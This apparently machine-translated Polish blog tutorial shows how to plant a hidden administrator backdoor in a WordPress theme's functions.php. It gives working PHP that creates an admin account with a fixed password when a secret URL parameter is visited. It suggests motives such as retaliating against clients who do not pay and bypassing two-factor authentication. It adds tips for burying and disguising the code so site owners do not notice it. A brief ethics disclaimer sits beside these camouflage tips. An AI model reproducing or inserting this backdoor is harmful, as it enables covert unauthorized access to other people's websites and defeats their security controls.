Jak utworzyć tajny dostęp administratora backdoora do WordPress

Opublikowany: 2022-09-15

Czy kiedykolwiek stworzyłeś stronę WordPress lub świadczyłeś usługi dla swojego klienta, ale nie otrzymałeś zapłaty? Jeśli brzmi to znajomo, wylądowałeś we właściwym miejscu.

Aby uchronić się przed tą sytuacją, warto wiedzieć, jak utworzyć tajny dostęp do witryny typu backdoor w WordPress.

Ponadto, jeśli z jakiegoś powodu nie możesz uzyskać dostępu do swojej witryny WordPress, posiadanie alternatywnego dostępu do backdoora w celu odzyskania kontroli może być bardzo przydatne!

W tym samouczku omówię tajny dostęp do stron internetowych z tylnymi drzwiami i powody, dla których warto utworzyć taki dostęp, aby mieć pewność, że zawsze masz dostęp do swoich stron internetowych.

Na koniec pokażę Ci, jak go stworzyć, krok po kroku, a następnie poradę etyczną.

Spis treści
  1. Co to jest dostęp administratora tajnego backdoora w WordPressie?
  2. Jakie są podstawowe powody tworzenia dostępu do witryny typu backdoor?
  3. Porady etyczne dotyczące tworzenia dostępu do strony backdoora
  4. Jak działa backdoor haseł WordPress?
  5. Jak utworzyć tajny dostęp do strony z backdoorem
    • Krok 1: Otwórz plik functions.php z edytora plików motywu
    • Krok 2: Skopiuj i wklej następujący kod do pliku functions.php
    • Krok 3: Utwórz adres URL z niestandardowymi parametrami, aby uzyskać dostęp administratora
    • Wskazówka dla profesjonalistów: bądź bardziej przebiegły i zakamufluj tylne drzwi
  6. Teraz twoja kolej!

Co to jest dostęp administratora tajnego backdoora w WordPressie?

tajny dostęp do strony backdoora

Jak sugeruje termin, dostęp do backdoora to sposób na odzyskanie dostępu administratora do witryny WordPress, jeśli zwykłe logowanie nie działa.

Zastanawiasz się, jak możesz stracić konto administratora?

Jeśli jesteś programistą lub agencją WordPress, możesz zauważyć, że klienci usuwają Twoje konto administratora po zakończeniu pracy, próbując chronić witrynę, gdy nie płacą.

W najgorszym przypadku hakerzy mogą uzyskać nieautoryzowany dostęp do Twojej witryny i zmienić hasło administratora lub całkowicie usunąć login.

Jeśli tak się stanie, potrzebujesz sposobu na odzyskanie dostępu. W tym momencie do gry wkracza tajne tylne wejście.

Jakie są podstawowe powody tworzenia dostępu do witryny typu backdoor?

Istnieje kilka potencjalnych powodów, dla których warto utworzyć tajny dostęp administratora backdoora do witryny WordPress:

  • Aby odzyskać dostęp administratora w przypadku nieotrzymania zapłaty od klientów.
  • Aby zachować dostęp , należy włamać się na stronę i zmienić dane konta administratora.
  • Aby umożliwić łatwy dostęp do panelu administracyjnego bez zapamiętywania nazwy użytkownika lub hasła.
  • Aby ominąć stosowane środki bezpieczeństwa , takie jak uwierzytelnianie dwuskładnikowe.
  • Aby umożliwić komuś innemu dostęp do witryny bez znajomości oryginalnego hasła, którego używasz.
  • Utworzenie tajnego dostępu administratora backdoora może być pomocne w sytuacjach, gdy zapamiętanie nazwy użytkownika lub hasła jest trudne lub niewygodne .

Jednak tworzenie backdoora może również stanowić zagrożenie bezpieczeństwa, ponieważ omija wszelkie środki bezpieczeństwa, które mogą być stosowane.

Dlatego zalecam rozważenie zalet i wad przed utworzeniem tajnego dostępu administratora do backdoora, zanim to zrobisz.

Porady etyczne dotyczące tworzenia dostępu do strony backdoora

Istnieją etyczne implikacje w tworzeniu tajnego dostępu backdoorem do czyjejś witryny internetowej. Jest to zdecydowanie coś do rozważenia przed utworzeniem jednego.

Niezależnie od tego, jak ważny jest powód, mieszasz się z cudzą własnością (kiedy już za nią zapłacili), więc pomyśl o konsekwencjach, jeśli planujesz dodać tylne drzwi.

Zachęcam, aby nie dodawać tylnych drzwi do stron internetowych, chyba że nie ma innego wyjścia. Nie odpowiadam za takie działania. Polecam go używać tylko z uzasadnionych lub prawnych powodów.

Jak działa backdoor haseł WordPress?

Backdoor WordPress działa przy użyciu PHP w głównym pliku WordPress. Kod, który udostępnię za chwilę, utworzy nowe konto administratora, gdy odwiedzisz określony adres URL.

Po utworzeniu będziesz mógł zalogować się do swojej witryny i wykonać dowolne zadanie.

Po zarejestrowaniu fragmentu kodu PHP w functions.php możesz go uruchomić za pomocą adresu URL z niestandardowym zapytaniem. Adres URL zawiera słowo kluczowe, które wstawiasz podczas edycji pliku functions.php.

Teraz możesz się zastanawiać, czy tajne konto będzie istniało przed uruchomieniem funkcji.

Odpowiedź brzmi nie". Twoje nowe konto użytkownika zostanie utworzone dopiero po uruchomieniu funkcji przy użyciu adresu URL zawierającego określony parametr.

Jak utworzyć tajny dostęp do strony z backdoorem

Poniższy proces obejmuje modyfikację pliku PHP. Jest całkowicie bezpieczny, ale musisz się upewnić, że za pierwszym razem zrobisz to dobrze.

Postępuj zgodnie z tymi instrukcjami, a wszystko będzie dobrze!

Aby zapobiec potencjalnym problemom, polecam edycję pliku functions.php za pomocą motywu potomnego. Jeśli używasz motywu Astra, możesz utworzyć motyw podrzędny za pomocą jednego kliknięcia.

Krok 1: Otwórz plik functions.php z edytora plików motywu

Będziemy modyfikować plik functions.php, który jest podstawowym plikiem WordPress.

  • Przejdź do pulpitu administracyjnego WordPress.
  • Przejdź do Wygląd > Edytor plików motywów.
przejdź do wyglądu> edytor plików motywów
  • Teraz wybierz plik functions.php z prawego paska bocznego.
otwórz funkcje.php

Krok 2: Skopiuj i wklej następujący kod do pliku functions.php

Teraz wystarczy skopiować i wkleić ten fragment kodu PHP do edytora.

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Z kodu zobaczysz, że utworzy nowego administratora o nazwie ' mr_admin ' z hasłem ' pa55w0rd! „.

Możesz je zmienić według własnego uznania.

  • Umieść kod w dowolnym miejscu w pliku PHP. Najlepiej między innymi funkcjami. Nie chcesz, aby administrator witryny lub menedżerowie wiedzieli, że wstrzykujesz ten kod, prawda? Więc wklejam go w dolnej środkowej części dokumentu.
  • Upewnij się również, że wklejasz kod bezpośrednio nad /** lub zaraz po znakach */ .
wklejanie kodu bezpośrednio nad /** lub zaraz po znakach */
  • Kliknij przycisk „ Aktualizuj plik ”.
kliknij przycisk aktualizacji pliku

Teraz plik powinien zostać zaktualizowany, a backdoor jest na swoim miejscu.

plik edytowany pomyślnie

Krok 3: Utwórz adres URL z niestandardowymi parametrami, aby uzyskać dostęp administratora

Teraz, gdy musisz uruchomić tę funkcję lub spróbować uzyskać dostęp administracyjny, upewnij się, że po prawej stronie domeny dodałeś następującą informację:

/? backdoor=idź

[Tutaj backdoor to parametr zapytania po słowie kluczowym GET ]. Aby być bardziej szczegółowym, spójrz na poniższy zrzut ekranu:

słowo kluczowe funkcji

Jeśli więc Twoja witryna to www.xyz.com , URL dostępu do backdoora będzie miał postać „ www.xyz.com/?backdoor=go ”.

Po dodaniu informacji obok nazwy domeny, naciśnij Enter.

uruchomienie funkcji z parametrami

Bam! To takie proste!

Teraz sprawdź swoje nowe konto administratora w Użytkownicy > Wszyscy użytkownicy .

nowe tajne konto użytkownika

Wskazówka dla profesjonalistów: bądź bardziej przebiegły i zakamufluj tylne drzwi

Wskazówka 1: Zmiana parametrów i nazwy funkcji

Możesz zmienić nazwę funkcji, parametry fragmentu kodu według potrzeb.

W ten sposób możesz przebrać się w kamuflaż. Oto fragment kodu kamuflażu, w którym zmieniłem słowo kluczowe „ backdoor ” na „ path ”:

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Oznaczałoby to, że adres URL www.xyz.com zmieni się na „ www.xyz.com/?pathway=go ”.

Wskazówka 2: Zmień nazwę użytkownika

Aby zmienić nazwę użytkownika, zamień ciąg „ mr_admin ” na „ hellboy

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Wskazówka 3: Zmiana hasła

Aby zmienić hasło, zastąp słowo kluczowe „ pa55w0rd! ” z „ hell_pass! ”.

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Wskazówka 4: Konstruowanie nowego adresu URL i ślimaka

Tak więc, aby uruchomić funkcję, musisz użyć następującego adresu URL ze słowem kluczowym „ path ”:

www.xyz.com/?pathway=go

I to wszystko. Utworzyłeś teraz tylne drzwi i przećwiczyłeś dostosowywanie ustawień, aby były wyjątkowe.!

Teraz twoja kolej!

Pamiętaj, że dodawanie tajnego dostępu do witryny typu backdoor nie powinno być łatwe. Ale jeśli musisz to zrobić, teraz wiesz jak.

Niezależnie od tego, dlaczego może być konieczne odzyskanie dostępu do strony internetowej, jest to jeden z najłatwiejszych sposobów na zrobienie tego.

Jeśli utknąłeś w którymś z tych kroków, możesz napisać mi linię w sekcji komentarzy poniżej.

Możesz także dołączyć do mojej społeczności na Facebooku, aby być na bieżąco z moimi najnowszymi wiadomościami!